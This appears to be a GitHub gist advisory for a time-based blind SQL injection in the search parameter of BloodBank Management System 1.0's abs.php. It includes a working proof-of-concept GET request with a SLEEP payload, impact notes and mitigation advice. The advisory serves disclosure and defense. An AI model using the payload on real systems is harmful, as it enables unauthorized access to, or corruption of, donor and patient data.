Skip to content

Instantly share code, notes, and snippets.

@higordiego
Last active October 25, 2024 13:21
Show Gist options
  • Save higordiego/46090516ba1b13fe3d2607ab4c0114f1 to your computer and use it in GitHub Desktop.
Save higordiego/46090516ba1b13fe3d2607ab4c0114f1 to your computer and use it in GitHub Desktop.

Affected Version:

  • BloodBank Management System: 1.0

Vulnerability Information:

  • Vulnerability Type: SQL Injection (Time-Based Blind)
  • Severity: HIGH
  • Status: Unpatched

Vulnerable Endpoint:

  • /abs.php?search=A%2B&submit=search

Vulnerability Description:

A SQL Injection vulnerability has been identified in the BloodBank Management System version 1.0. This vulnerability occurs in the search functionality when users query blood type availability. The search parameter is not properly sanitized, allowing attackers to inject malicious SQL queries.

This vulnerability allows an attacker to manipulate SQL queries and execute arbitrary database commands, potentially leading to:

  • Unauthorized access to sensitive data (e.g., donor or recipient information).
  • Database corruption or deletion.
  • Denial of Service (DoS) attacks by causing the database to execute time-consuming operations.

Since the injected payload persists through the search feature, this high-risk vulnerability could be exploited by remote attackers, leading to a significant breach of confidentiality and availability.


Proof of Concept (PoC):

Below is an example of a GET request that demonstrates a time-based blind SQL injection. This payload causes the database to sleep for 5 seconds, proving the injection is successful:

GET /abs.php?search=A%2b'%20AND%20(SELECT%209622%20FROM%20(SELECT(SLEEP(5)))lCfZ)--%20lpxk%26submit%3dsearch&submit=search HTTP/1.1
Host: localhost:8080
sec-ch-ua: "Chromium";v="129", "Not=A?Brand";v="8"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Accept-Language: pt-BR,pt;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:8080/abs.php
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=48068ce7875c00d88ca3aa2b9269b91f
Connection: keep-alive

If the query is successful, the system will pause for 5 seconds before responding. This confirms the vulnerability and proves that the query can be manipulated to execute arbitrary SQL commands.


Impact:

  • Data Breach: Unauthorized access to personal information such as blood donors’ and recipients’ data.
  • Service Disruption: Attackers can overload the database, causing a Denial of Service (DoS) by executing time-intensive queries.
  • Data Corruption: Malicious actors can modify or delete critical data in the system.

Images

  • Vulnerability Source
  • BurpSuite Request Image

Mitigation Recommendations:

  1. Input Validation & Sanitization: Use parameterized queries or prepared statements to prevent SQL injection.
  2. Error Handling: Ensure error messages do not reveal database information or SQL query structures.
  3. Rate Limiting: Implement rate limiting on search requests to prevent abuse via DoS attacks.
  4. Database User Privileges: Restrict the privileges of database users to minimize the impact of potential SQL injections.
  5. Security Audits: Regularly perform code reviews and penetration tests to identify and fix vulnerabilities.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment